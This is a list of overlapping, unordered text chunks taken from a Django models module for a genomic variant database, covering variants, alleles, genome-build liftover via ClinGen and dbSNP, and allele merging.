"def get_from_tuple(variant_tuple: VariantCoordinate, genome_build: GenomeBuild) -> 'Variant': params = [\"locus__contig__name\", \"locus__position\", \"locus__ref__seq\", \"alt__seq\"]",
"get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class",
"genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can",
"of variants - usually used as a cached result \"\"\" RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"]",
"build VCF first Alleles must have already been created - allele_source used to",
"gbc_qs = GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self)",
"return f\"{chrom}:{position} {ref}>{alt}\" @staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN)",
"message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class Sequence(models.Model): \"\"\"",
"= self.allele if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) ->",
"for va in other_allele.variantallele_set.all(): try: va.allele = self va.conversion_tool = conversion_tool va.save() except",
"but sometimes that can fail. Linked against Variant with VariantAllele below \"\"\" clingen_allele",
"2+ per line in a VCF file (ref + >= 1 alts pointing",
"{self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write",
"@staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q: qs = qs.filter(q) return dict(qs.values_list(\"seq\",",
"def get_variant_allele_ids(self): return self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele =",
"self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta := self.get_canonical_transcript_annotation(genome_build):",
"va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not",
"AlleleConversionTools (eg ClinGen AlleleRegistry) we can write the VCF in the desired genome",
"= VariantAllele.objects.filter(variant=self).first() if va: return va.allele return None @property def equivalent_variants(self) -> Iterable['Variant']:",
"to write VCF coordinates during liftover. Can be slow (API call) If you",
"self.alt) def get_absolute_url(self): # will show allele if there is one, otherwise go",
"class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where ID is",
"self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant of %s/%s/%s",
"one, otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) ->",
"return self.variant_for_build(genome_build=GenomeBuild.grch38(), best_attempt=False) except ValueError: return None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True))",
"of alleles for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None",
"bytes, maximum size is 8191\" The easiest solution is to md5sum seq and",
"{self.variant_id}({self.genome_build}/{self.conversion_tool})\" class VariantCollection(RelatedModelsPartitionModel): \"\"\" A set of variants - usually used as a",
"Variant(models.Model): \"\"\" Variants represent the different alleles at a locus Usually 2+ per",
"gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus = self.locus contig = locus.contig return",
"GenomeBuild): \"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod",
"flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self): error = None if va",
"f\"{path_to_variant}locus__position\", V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position,",
"not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav =",
"import md5sum_str from snpdb.models import Wiki from snpdb.models.flag_types import allele_flag_types from snpdb.models.models_clingen_allele import",
"return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge other_allele",
"LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model):",
"Postgres contrib has BtreeGistExtension to add via migration \"\"\" seq = models.TextField() seq_md5_hash",
"get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\" Used by to write VCF coordinates",
"TextFields give error of: \"index row requires x bytes, maximum size is 8191\"",
"= genome_build.chrom_contig_mappings[chrom] variant_tuple = VariantCoordinate(contig.name, int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string:",
"variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import get_hgvs_variant_tuple # Check if",
"return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self):",
"class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\"",
"one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self)",
"if va := self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\")",
"\", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def __str__(self): name = f\"Allele {self.pk}\" if self.clingen_allele: name +=",
"best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build: va =",
"against Variant with VariantAllele below \"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self):",
"= models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate', 'chrom pos ref alt') class",
"constraints, and large TextFields give error of: \"index row requires x bytes, maximum",
"get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) -> Optional['Variant']: variant_tuple = Variant.get_tuple_from_string(variant_string, genome_build, regex_pattern=regex_pattern) try:",
"self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is",
"return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version return",
"a bug to have the same 3 variant/build/allele so we can add that",
"for liftover pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self):",
"variant.start <= end AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"),",
"self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self): # will show allele if there is one,",
"!= Variant.REFERENCE_ALT and self.locus.ref.length != self.alt.length @property def is_insertion(self) -> bool: return self.alt.seq",
"@property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length",
"from snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\"",
"use Gist indexes but that requires installing the btree_gist extension (requires postgres Admin",
"regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position, ref, alt = Variant.clean_variant_fields(chrom,",
"seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None):",
"self.get_allele_source().liftover_complete(genome_build=self.genome_build) def __str__(self): source = \"\" if self.source_genome_build: source = f\"from {self.source_genome_build.name} \"",
"from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import format_chrom from library.utils import md5sum_str from",
"is one, otherwise go to variant page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def",
"g_hgvs = self.clingen_allele.get_g_hgvs(genome_build) conversion_tool = AlleleConversionTool.CLINGEN_ALLELE_REGISTRY except ValueError: # Various contig errors all",
"on the Variant object - instead do 1-to-1 \"\"\" # Some builds share",
"choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True, on_delete=CASCADE, related_name=\"liftover_source_genome_build\") genome_build = models.ForeignKey(GenomeBuild,",
"{ 'label': f'Allele {allele.id}' }, source_object=allele) class AlleleMergeLog(TimeStampedModel): \"\"\" Keep track of calls",
"alt sequence is standard [GATCN] (ie not special or reference) \"\"\" # locus.ref",
"build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) def get_genome_build(self): return self.variant_allele.genome_build",
"None @lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) ->",
"variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None g_hgvs = None if self.clingen_allele: try:",
"= None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom,",
"va and not best_attempt: raise ValueError(f'Could not find a variant in allele {self.id}",
"migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField() def",
"for your build, use variant_for_build(genome_build).as_tuple() \"\"\" from snpdb.models.models_dbsnp import DbSNP from genes.hgvs import",
"if not va: va = vas.first() if va: return va.variant raise ValueError(f'Could not",
"objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self):",
"models.ForeignKey(Variant, on_delete=CASCADE) class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines.",
"snpdb.models.models_genome import Contig, GenomeBuild, GenomeBuildContig LOCUS_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN",
"if not allele: return [self] return Variant.objects.filter(variantallele__allele=allele) def get_canonical_transcript_annotation(self, genome_build) -> Optional['VariantTranscriptAnnotation']: vav",
"= 20): if len(s) > max_length: s = f\"{s[:3]}...{s[-3:]}\" return s def __str__(self):",
"return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) -> VariantCoordinate: locus =",
"genome_build) return conversion_tool, variant_tuple def merge(self, conversion_tool, other_allele: \"Allele\") -> bool: \"\"\" Merge",
"ref = ref.strip().upper() alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom",
"self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if format_spec",
"FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext from library.django_utils.django_partition import RelatedModelsPartitionModel from library.genomics import",
"allele = models.ForeignKey(Allele, on_delete=CASCADE) origin = models.CharField(max_length=1, choices=AlleleOrigin.choices) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) error",
"{self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into {self}\" other_clingen_allele",
"1 Locus for a given chrom/position/ref per database (handled via insertion queues) \"\"\"",
"return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str: if abbreviate:",
"V(\" \"), f\"{path_to_variant}locus__ref__seq\", V(\">\"), f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref,",
"a small fraction of Variants So don't want them on the Variant object",
"liftover pipeline (once per build) \"\"\" pass class VariantAlleleSource(AlleleSource): variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE)",
"the same locus for the row) There is only 1 Variant for a",
"pipelines. \"\"\" objects = InheritanceManager() def get_genome_build(self): return None def get_variants_qs(self): return Variant.objects.none()",
"via migration \"\"\" seq = models.TextField() seq_md5_hash = models.CharField(max_length=32, unique=True) length = models.IntegerField()",
"CASCADE, DO_NOTHING from django.db.models.fields import TextField from django.db.models.functions import Greatest from django.db.models.functions.text import",
"build independent - ie GRCh37 and GRCh38 variants for same change point to",
"Optional['VariantTranscriptAnnotation']: vav = genome_build.latest_variant_annotation_version if can := self.varianttranscriptannotation_set.filter(version=vav, canonical=True).first(): return can if version",
"\"\"\" Restrict to contigs in a genome build \"\"\" return Q(locus__contig__genomebuildcontig__genome_build=genome_build) @staticmethod def",
"self.variantallelecollectionrecord_set.values_list(\"variant_allele\", flat=True) class VariantAlleleCollectionRecord(models.Model): collection = models.ForeignKey(VariantAlleleCollectionSource, on_delete=CASCADE) variant_allele = models.ForeignKey(VariantAllele, on_delete=CASCADE) class",
"self.variant_for_build(genome_build=GenomeBuild.grch37(), best_attempt=False) except ValueError: return None @lazy def grch38(self) -> Optional['Variant']: try: return",
"as ClinGen or 2 loci in a genome build being represented by 1",
"vas = self.variant_alleles() va = None if genome_build: va = vas.filter(genome_build=genome_build).first() if not",
"GenomeBuild, best_attempt=True) -> 'Variant': vas = self.variant_alleles() va = None if genome_build: va",
"s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if q:",
"conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate = collections.namedtuple('VariantCoordinate',",
"RECORDS_BASE_TABLE_NAMES = [\"snpdb_variantcollectionrecord\"] RECORDS_FK_FIELD_TO_THIS_MODEL = \"variant_collection_id\" PARTITION_LABEL_TEXT = \"variant_collection\" name = models.TextField(null=True) count",
"all! Cannot liftover\") dbsnp = DbSNP.get_for_variant(va.variant, va.genome_build.latest_variant_annotation_version) if dbsnp: g_hgvs = dbsnp.get_g_hgvs(genome_build, alt=va.variant.alt)",
"def equivalent_variants(self) -> Iterable['Variant']: allele = self.allele if not allele: return [self] return",
"name = f\"Allele {self.pk}\" if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def",
">= 1 alts pointing to the same locus for the row) There is",
"**kwargs): # pylint: disable=unused-argument alleles = Allele.objects.filter(flag_collection__in=flag_infos.ids) allele: Allele for allele in alleles:",
":= self.varianttranscriptannotation_set.first(): return any_at_all def get_canonical_c_hgvs(self, genome_build): c_hgvs = None if cta :=",
"str(cligen_allele) else: return f\"Allele {self.pk}\" def validate(self, liftover_complete=True): \"\"\" :param liftover_complete: If False",
"\"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED) @property",
"a genome build being represented by 1 loci in the build being used",
"re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)$\", re.IGNORECASE) LOCUS_NO_REF_PATTERN = r\"^([^:]+):(\\d+)$\" VARIANT_PATTERN = re.compile(r\"^([^:]+):(\\d+)[,\\s]*([GATC]+)>(=|[GATC]+)$\", re.IGNORECASE) allele_validate_signal = django.dispatch.Signal(providing_args=[\"allele\"]) class",
"self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True)",
"seq and make the constraint on that. Another possible solution is to use",
"get_variants_qs(self): return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This",
"set to Allele.pk and then creating VariantAllele entries for the variant/allele Some AlleleConversionTools",
"a variant but invalid error_message = models.TextField() class Meta: unique_together = ('liftover', 'allele')",
"f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self, conversion_tool=conversion_tool, success=can_merge, message=merge_log_message) if",
"otherwise go to variant page return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext:",
"int(position), ref, alt) return variant_tuple @staticmethod def get_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern=VARIANT_PATTERN) ->",
"length = models.IntegerField() def save(self, force_insert=False, force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash",
"queues) \"\"\" REFERENCE_ALT = \"=\" locus = models.ForeignKey(Locus, on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE)",
"work) other_allele.clingen_allele = None other_allele.save() self.clingen_allele = other_clingen_allele self.save() if other_fc := other_allele.flag_collection:",
"same variant linked through different VariantAlleles (so it can't be 1-to-1) variant =",
"not check for missing representations \"\"\" if liftover_complete: v37 = self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 =",
"None if m := regex_pattern.match(variant_string): chrom, position, ref, alt = m.groups() chrom, position,",
"related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message = models.TextField(null=True) VariantCoordinate",
"@staticmethod def get_tuple_from_string(variant_string: str, genome_build: GenomeBuild, regex_pattern: Pattern[str] = VARIANT_PATTERN) -> VariantCoordinate: \"\"\"",
"path_to_variant=\"\"): \"\"\" Return a \"1:123321 G>C\" style string in a query \"\"\" kwargs",
"on_delete=CASCADE) alt = models.ForeignKey(Sequence, on_delete=CASCADE) class Meta: unique_together = (\"locus\", \"alt\") @staticmethod def",
"AND variant.end_position >= start \"\"\" annotation_kwargs = {\"longest_sequence\": Greatest(\"locus__ref__length\", \"alt__length\"), \"end_position\": F(\"locus__position\") +",
"f\"{path_to_variant}alt__seq\", output_field=TextField())} return qs.annotate(**kwargs) @staticmethod def format_tuple(chrom, position, ref, alt, abbreviate=False) -> str:",
"if liftover was done via VariantAlleleSource \"\"\" allele_sources_qs = VariantAlleleSource.objects.filter(variant_allele__allele=allele) return Liftover.objects.filter(allele_source__in=allele_sources_qs, genome_build=genome_build).first()",
"self.source_genome_build: source = f\"from {self.source_genome_build.name} \" return f\"Liftover {source}to {self.genome_build} via {self.get_conversion_tool_display()}\" class",
"other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection) existing_allele_cc_names = self.clinicalcontext_set.values_list(\"name\", flat=True)",
"\"\"\" clingen_allele = models.OneToOneField(ClinGenAllele, null=True, on_delete=CASCADE) def get_absolute_url(self): # will show allele if",
"def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord', condition=vcr_condition)} def get_q(self): if self.status",
"bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length > self.alt.length @property def can_have_clingen_allele(self) ->",
"or self.is_reference @property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate:",
"snpdb.models.models_clingen_allele import ClinGenAllele from snpdb.models.models_enums import AlleleConversionTool, AlleleOrigin, ProcessingStatus from snpdb.models.models_genome import Contig,",
"alt = alt.strip().upper() if Variant.is_ref_alt_reference(ref, alt): alt = Variant.REFERENCE_ALT chrom = format_chrom(chrom, want_chr)",
"- allele_source used to retrieve them The VCF (in genome_build build) is set",
"VariantAlleleCollectionSource(AlleleSource): genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids())",
"@lazy def variants(self): return Variant.objects.filter(pk__in=self.variant_alleles().values_list('variant', flat=True)) def variant_for_build(self, genome_build: GenomeBuild, best_attempt=True) -> 'Variant':",
"self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_38, only_if_new=True) allele_validate_signal.send(sender=Allele, allele=self) @receiver(flag_collection_extra_info_signal, sender=FlagCollection) def get_extra_info(flag_infos: FlagInfos, user: User, **kwargs): #",
"by default uses indexes for constraints, and large TextFields give error of: \"index",
"import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin, FlagTypeContext",
"= False merge_log_message = f\"Error performing {merge_log_message}: both have ClinGen Alleles!\" AlleleMergeLog.objects.create(old_allele=other_allele, new_allele=self,",
"= GenomeBuildContig.objects.filter(genome_build__in=GenomeBuild.builds_with_annotation(), contig__locus__variant=self) return {gbc.genome_build for gbc in gbc_qs} @lazy def coordinate(self) ->",
"abbreviation \"\"\" return self.format_tuple(*self.as_tuple()) def __str__(self): return self.format_tuple(self.locus.contig.name, self.locus.position, self.locus.ref, self.alt) def get_absolute_url(self):",
"not being the same as ClinGen or 2 loci in a genome build",
"return can if version := self.varianttranscriptannotation_set.filter(version=vav).first(): return version if any_at_all := self.varianttranscriptannotation_set.first(): return",
"va.allele = self va.conversion_tool = conversion_tool va.save() except IntegrityError: logging.warning(\"VariantAllele exists with allele/build/variant",
"start, end): \"\"\" Query handling indels. Contigs must match and variant.start <= end",
"G/A/T/C/N \"\"\" return not re.match(r\"[^GATCN]\", self.seq) class Locus(models.Model): \"\"\" 1 per line in",
":= self.get_canonical_transcript_annotation(genome_build): c_hgvs = cta.hgvs_c return c_hgvs @property def start(self): return self.locus.position @property",
"{self.id} for build {genome_build}') if not va: va = vas.first() if va: return",
"any variants in allele {self.id}') def get_liftover_variant_tuple(self, genome_build: GenomeBuild) -> Tuple[str, 'VariantCoordinate']: \"\"\"",
"va.delete() return can_merge @property def build_names(self) -> str: return \", \".join(sorted(self.variantallele_set.values_list(\"genome_build__name\", flat=True))) def",
"via insertion queues) \"\"\" contig = models.ForeignKey(Contig, on_delete=CASCADE) position = models.IntegerField(db_index=True) ref =",
"Allele.merge() \"\"\" old_allele = models.ForeignKey(Allele, related_name=\"old_allele_merge\", on_delete=CASCADE) new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool",
"size is 8191\" The easiest solution is to md5sum seq and make the",
"default=ProcessingStatus.CREATED) @property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias:",
"= locus.contig return VariantCoordinate(chrom=contig.name, pos=locus.position, ref=locus.ref.seq, alt=self.alt.seq) @staticmethod def is_ref_alt_reference(ref, alt): return ref",
"to merge {self} to itself!\") can_merge = True merge_log_message = f\"{other_allele} merge into",
"== other_allele: raise ValueError(f\"Attempt to merge {self} to itself!\") can_merge = True merge_log_message",
"@property def can_have_annotation(self) -> bool: return self.is_standard_variant def as_tuple(self) -> VariantCoordinate: return self.locus.contig.name,",
"we need to write the source genome build VCF first Alleles must have",
"genome_build_contigs: conversion_tool = AlleleConversionTool.SAME_CONTIG variant_tuple = variant_allele.variant.as_tuple() return conversion_tool, variant_tuple conversion_tool = None",
"return reverse('view_allele', kwargs={\"pk\": self.id}) def flag_type_context(self) -> FlagTypeContext: return FlagTypeContext.objects.get(pk=\"allele\") @lazy def clingen_error(self):",
"= self.variant_alleles().filter(genome_build=GenomeBuild.grch37()).first() v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38:",
"for a given chrom/position/ref per database (handled via insertion queues) \"\"\" contig =",
"# links there, and can't have another, so it'll work) other_allele.clingen_allele = None",
"return self.locus.position + max(self.locus.ref.length, self.alt.length) @staticmethod def clean_variant_fields(chrom, position, ref, alt, want_chr): ref",
"chrom, position, ref, alt = Variant.clean_variant_fields(chrom, position, ref, alt, want_chr=genome_build.reference_fasta_has_chr) contig = genome_build.chrom_contig_mappings[chrom]",
"model_utils.managers import InheritanceManager from flags.models import FlagCollection, flag_collection_extra_info_signal, FlagInfos from flags.models.models import FlagsMixin,",
"__str__(self): return f\"VariantCollection: {self.pk} ({self.name})\" class VariantCollectionRecord(models.Model): variant_collection = models.ForeignKey(VariantCollection, on_delete=DO_NOTHING) # handled",
"return s def __str__(self): return self.abbreviate(self.seq) @staticmethod def get_pk_by_seq(q=None): qs = Sequence.objects.all() if",
"end): \"\"\" Query handling indels. Contigs must match and variant.start <= end AND",
"if self.clingen_allele: name += f\" ({self.clingen_allele})\" return name def __format__(self, format_spec: str): if",
"force_update=False, using=None, update_fields=None): if not self.seq_md5_hash: self.seq_md5_hash = md5sum_str(self.seq) super().save(force_insert=force_insert, force_update=force_update, using=using, update_fields=update_fields)",
"AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects =",
"all subclass from this pass if g_hgvs is None: if settings.LIFTOVER_DBSNP_ENABLED: va =",
"genome_build = models.ForeignKey(GenomeBuild, on_delete=CASCADE) def get_genome_build(self): return self.genome_build def get_variants_qs(self): return Variant.objects.filter(variantallele__in=self.get_variant_allele_ids()) def",
"= \"variant_collection\" name = models.TextField(null=True) count = models.IntegerField(null=True) status = models.CharField(max_length=1, choices=ProcessingStatus.choices, default=ProcessingStatus.CREATED)",
"= django.dispatch.Signal(providing_args=[\"allele\"]) class Allele(FlagsMixin, models.Model): \"\"\" Genome build independent - ie GRCh37 and",
"position, ref, alt class VariantWiki(Wiki): variant = models.OneToOneField(Variant, on_delete=CASCADE) class VariantAllele(TimeStampedModel): \"\"\" It's",
":= self.variantallele_set.filter(error__isnull=False).first(): error = va.error return error def variant_alleles(self): return self.variantallele_set.order_by(\"genome_build__name\") @lazy def",
"page return reverse('view_allele_from_variant', kwargs={\"variant_id\": self.pk}) @lazy def allele(self) -> Optional[Allele]: va = VariantAllele.objects.filter(variant=self).first()",
"new_allele = models.ForeignKey(Allele, related_name=\"new_allele_merge\", on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) success = models.BooleanField(default=True) message",
"self.alt.length @property def is_deletion(self) -> bool: return self.alt.seq != Variant.REFERENCE_ALT and self.locus.ref.length >",
"Check if the other build shares existing contig genome_build_contigs = set(c.pk for c",
"- in those cases # we'll have the same variant linked through different",
"v38 = self.variant_alleles().filter(genome_build=GenomeBuild.grch38()).first() if v37: self.close_open_flags_of_type(allele_flag_types.missing_37) else: self.flag_collection_safe.get_or_create_open_flag_of_type(flag_type=allele_flag_types.missing_37, only_if_new=True) if v38: self.close_open_flags_of_type(allele_flag_types.missing_38) else:",
"return self.alt.seq == self.REFERENCE_ALT @property def is_standard_variant(self) -> bool: \"\"\" Variant alt sequence",
"and make the constraint on that. Another possible solution is to use Gist",
"models.ForeignKey(AlleleSource, on_delete=CASCADE) conversion_tool = models.CharField(max_length=2, choices=AlleleConversionTool.choices) source_vcf = models.TextField(null=True) source_genome_build = models.ForeignKey(GenomeBuild, null=True,",
"models.ForeignKey(VariantAllele, on_delete=CASCADE) class Liftover(TimeStampedModel): \"\"\" Liftover pipeline involves reading through a VCF where",
"alts pointing to the same locus for the row) There is only 1",
"@property def variant_collection_alias(self): return f\"variantcollection_{self.pk}\" def get_annotation_kwargs(self): vcr_condition = Q(variantcollectionrecord__variant_collection=self) return {self.variant_collection_alias: FilteredRelation('variantcollectionrecord',",
"self.save() if other_fc := other_allele.flag_collection: other_fc.flag_set.update(collection=self.flag_collection_safe) other_fc.flagwatch_set.update(flag_collection=self.flag_collection) existing_fc_cc_names = self.flag_collection.clinicalcontext_set.values_list(\"name\", flat=True) other_fc.clinicalcontext_set.exclude(name__in=existing_fc_cc_names).update(flag_collection=self.flag_collection) other_fc.classification_set.update(flag_collection=self.flag_collection)",
"return Variant.objects.none() def get_allele_qs(self): return Allele.objects.filter(variantallele__variant__in=self.get_variants_qs()) def liftover_complete(self, genome_build: GenomeBuild): \"\"\" This is",
"class AlleleSource(models.Model): \"\"\" Provides a source of alleles for liftover pipelines. \"\"\" objects",
"get_variants_qs(self): return Variant.objects.filter(variantallele=self.variant_allele) @staticmethod def get_liftover_for_allele(allele, genome_build) -> Optional['Liftover']: \"\"\" Only works if",
"is None: raise ValueError(\"Allele contains no VariantAlleles at all! Cannot liftover\") dbsnp =",
"easiest solution is to md5sum seq and make the constraint on that. Another",
"indels. Contigs must match and variant.start <= end AND variant.end_position >= start \"\"\"",
"django.db.models.functions.text import Concat from django.db.models.query_utils import Q, FilteredRelation from django.dispatch import receiver from",
